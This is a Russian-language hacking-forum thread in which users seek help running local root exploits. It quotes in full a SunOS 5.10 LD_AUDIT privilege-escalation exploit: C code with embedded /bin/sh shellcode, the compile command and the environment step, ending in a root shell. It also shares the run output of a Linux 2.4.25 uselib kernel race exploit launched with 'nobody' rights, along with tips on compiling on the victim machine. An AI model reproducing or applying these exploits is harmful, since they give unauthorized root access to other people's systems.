ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Ок... спасибо =)

после такой компиляции со справочником этот сплойт привратитса во что угодно вплоть до эмулятора os/2 но только не експлойт =))) а вот учи С это на самом деле полезный совет .

Подскажите плз.
Нашел сплоит для SunOS 5.10, не понимаю как пользаваться. Эт тип PoC код какой-то.

atari:venglin:~> cat dupa.c
static char sh[] =
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\
x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x
01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe
8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68
\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\
x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x
04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xf
f";

int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
}
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
atari:venglin:~> su
# id
uid=0(root) gid=10(staff)

Создаешь файл dupa.c со следующим содержанием:
Компилируешь:
gcc -fPIC -shared -o /tmp/dupa.so dupa.c
Собираешь:
setenv LD_AUDIT /tmp/dupa.so

А его обязательно компилить и собирать на удаленой машине или откомпилировать можно у себя?

Bac9l
Желательно на удаленной, хотя в некоторых случаях возможно и на локальной (зависит от сплойта).

1. Linux 2.4.25 SMP
2. Права nobody.
Судя по всему, может порутать только uslibpr.c.
Собрал, запускаю:

./libr -d 0

[+] SLAB cleanup
child 1 VMAs 124
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xe7800000 - 0xffffd000
Wait... -
[+] race won maps=211

И так и висит. Вопрос - это нормально, или сплойт повис?))

P.S. Без параметра -d 0 выплевывает ошибку после Wait.

значит время для ожидания выполнения закончено нет конекта с сервером или код в установленный промежуток выполнить не удалось .

ground_zero, это во втором случае, если без -d 0. А что с первым?